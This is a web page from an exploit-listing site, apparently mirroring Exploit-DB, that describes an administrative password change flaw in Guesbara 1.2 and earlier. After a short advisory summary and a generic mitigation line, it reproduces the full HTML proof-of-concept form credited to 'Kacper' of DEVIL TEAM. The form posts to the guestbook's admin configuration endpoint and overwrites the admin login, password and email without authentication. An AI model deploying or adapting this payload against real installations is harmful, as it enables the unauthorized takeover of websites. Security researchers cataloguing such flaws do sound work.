Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Guesbara - exploit.company
header-logo
Suggest Exploit
vendor:
Guesbara
by:
Kacper
7.5
CVSS
HIGH
Change administrative password
CWE
Product Name: Guesbara
Affected Version From: 1
Affected Version To: 1.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Guesbara <= 1.2 Change admin login & password exploit by Kacper

The Guesbara application is vulnerable to a flaw that allows attackers to change the administrative password. By exploiting this vulnerability, an attacker can gain administrative access to the affected application, leading to a complete compromise of the application.

Mitigation:

It is recommended to update to a patched version of the Guesbara application or apply any available security fixes provided by the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23029/info

Guesbara is prone to a vulnerability that may permit attackers to change the administrative
password.

Exploiting this issue may allow an attacker to gain administrative access to the affected application. Successful exploits will result in a complete compromise of the application. 

<html> <title>Guestbara <= 1.2 Change admin login & password exploit by Kacper</title> <table border=0 cellspacing=0 cellpadding=0 align='center'> <form method='post' action='http://127.0.0.1/guestbook_path/admin/configuration.php?action=saveconfig&zapis=ok'><tr> <tr><td width=200>Admin Email</td><td><input type='text' name='admin_mail' class='textfield' value=''></td></tr> <tr><td width=200>Admin Name</td><td><input type='text' name='login' class='textfield' value=''></td></tr> <tr><td width=200>Admin Pass</td><td><input type='password' name='pass' class='textfield' value=''></td></tr> <tr><td colspan=2 align=center> <p> <input type='submit' name='submit' value='Zachowaj'> </p> <p>by Kacper </p> <p>for</p> <p><a href="http://www.rahim.webd.pl/" target="_blank">DEVIL TEAM </a></p></td></tr> </form></table> <p>&nbsp;</p> <p align="center">script download: http://www.hotscripts.pl/produkt-3051.html</p> <p align="center">Greetz @ll DEVIL TEAM </p> </html>

Navigation

Suggest Exploit

Services By CQR